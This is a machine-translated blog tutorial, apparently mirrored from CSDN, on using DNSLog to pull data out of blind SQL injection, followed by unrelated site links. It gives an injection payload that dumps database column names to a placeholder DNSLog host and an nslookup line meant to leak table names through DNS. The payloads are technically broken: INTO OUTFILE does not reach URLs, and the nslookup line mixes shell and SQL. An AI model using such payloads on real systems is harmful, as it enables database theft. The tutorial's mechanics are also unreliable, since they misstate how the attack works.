Using DNSLog No Echo Injection

Enterprise 2023-08-18 19:44:22 views: null

DNSLog concept

DNSLog (Domain Name System Log) is a special technology and service for capturing and logging requests and responses made through the Domain Name System (DNS) protocol. Its purpose is to help users track, analyze and manage DNS traffic and collect information related to domain names.

Basically, the DNSLog service provides a custom DNS server that keeps requests in a log and generates a unique domain name for each request. When a client (such as a web browser, application) sends a DNS request, the server will record the request and then generate a response containing some information about the original request. This information may include IP addresses, user agent strings, timestamps and other relevant data.

The principle of DNSLog non-echo injection

Echoless injection refers to an injection method that obtains the injection result through DNSLog when the injection point cannot directly obtain the response. The principle of echoless injection is to use the injection result as part of the DNS request, and get the response of the DNS request through DNSLog to obtain the injection result.

Steps to implement no-echo injection using DNSLog

  1. Construct injection payload: According to the injection point of the target application, construct the injection payload used to trigger the DNS request. For example, in the case of SQL injection attacks, the following payload can be used:

    ' OR 1=1 UNION SELECT 1, group_concat(column_name) FROM information_schema.columns INTO OUTFILE 'http://your-dnslog-service.com/' --

    This payload will trigger a DNS request to send the column name information from the target application to the DNSLog service.

  2. Insert Payload: Insert the payload at the injection point of the target application. The exact method depends on the structure and vulnerability points of the target application. Typically, the injection point is in an application's input field.

  3. Trigger injection: Submit a request processed by the injection payload to the application to trigger an injection attack.

  4. Check DNSLog service: Visit the DNSLog service of your choice to check if DNS requests are received. If the injection is successfully triggered, you will be able to see the corresponding request recorded on the DNSLog service.

give a chestnut

Use DNSLog to get database table information

Injection point: Find the injection point in the target application and construct the injection statement.

SELECT table_name FROM information_schema.tables WHERE table_schema=database()

 

Send the injection statement to the DNSLog server as part of the DNS request.

nslookup `SELECT table_name FROM information_schema.tables WHERE table_schema=database()`.example.com

 

View the response of the DNS request on the DNSLog server to obtain the injection result.

nslookup -type=txt SELECT.*.example.com

diagram 

You can refer to the article of the big guy

 SQL injection dnslog injection – ngin0x's blog

 

Guess you like

Origin blog.csdn.net/qq_56698744/article/details/131779901
Recommended
Ranking
PAT Level B 1094 Google's Recruitment (20 points) Python
Old Wei wins the offer to take you to learn --- brush (integer number 31. 1 appears) title series
Bilibili: Barrage Screening: Baijiaxing: Import XML directly
개체 배열 중복 제거
matplotlib—patches.Circle
[Observation] It is also a cordless vacuum cleaner, why does Dyson V10 dare to sell 4990 yuan?
0410
Apache Kafka message delivery reliability analysis
How hotel occupancy records inquiry etj
Essential knowledge for getting started with speculating in spot silver
Daily
More
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)
2024-04-23(30)
2024-04-22(5)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)

Code World

© 2018 codetd.com